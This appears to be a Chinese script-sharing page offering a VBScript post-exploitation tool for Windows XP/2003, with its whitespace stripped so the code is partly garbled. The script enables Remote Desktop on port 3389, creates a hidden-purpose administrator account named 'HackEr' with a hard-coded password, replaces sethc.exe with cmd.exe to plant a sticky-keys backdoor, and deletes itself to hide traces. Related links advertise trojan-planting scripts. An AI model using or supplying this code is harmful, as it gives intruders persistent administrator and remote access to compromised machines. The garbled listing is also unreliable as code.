复制代码 代码如下:

onerrorresumenext

constHKEY_LOCAL_MACHINE=&H80000002

strComputer="."

SetStdOut=WScript.StdOut

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&_

strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMCurrentControlSetControlTerminalServer"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp"

strKeyPath="SYSTEMCurrentControlSetControlTerminalServer"

strValueName="fDenyTSConnections"

dwValue=0

oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp"

strValueName="PortNumber"

dwValue=3389

oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath="SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp"

strValueName="PortNumber"

dwValue=3389

oReg.SetDWORDValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

onerrorresumenext

dimusername,password:IfWscript.Arguments.CountThen:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":endif:setwsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Setob=GetObject(os):Setoe=GetObject(os&"/Administrators,group"):Setod=ob.Create("user",username):od.SetPasswordpassword:od.SetInfo:Setof=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echoof.ADsPath

OnErrorResumeNext

Dimobj,success

Setobj=CreateObject("WScript.Shell")

success=obj.run("cmd/ctakeown/f%SystemRoot%system32sethc.exe&echoy|cacls%SystemRoot%system32sethc.exe/G%USERNAME%:F©%SystemRoot%system32cmd.exe%SystemRoot%system32acmd.exe©%SystemRoot%system32sethc.exe%SystemRoot%system32asethc.exe&del%SystemRoot%system32sethc.exe&ren%SystemRoot%system32acmd.exesethc.exe",0,True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

【xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs】相关文章：

★ 远程开启/关闭目标telnet服务的windows脚本RTCS.vbs

★ VBS教程：VBScript 语句-Sub 语句

★ 两个批量挂马vbs脚本代码

★ VBS教程：方法-DeleteFile 方法

★ 利用sql语句复制一条或多条记录

★ 利用VBS实现显示系统服务列表

★ 简单的VBS加密实现代码

★ VBS中的SetLocale函数到底有什么用？

★ 用vbs实现配置静态 IP 地址

★ 获取外网IP并发送到指定邮箱的vbs代码[已测]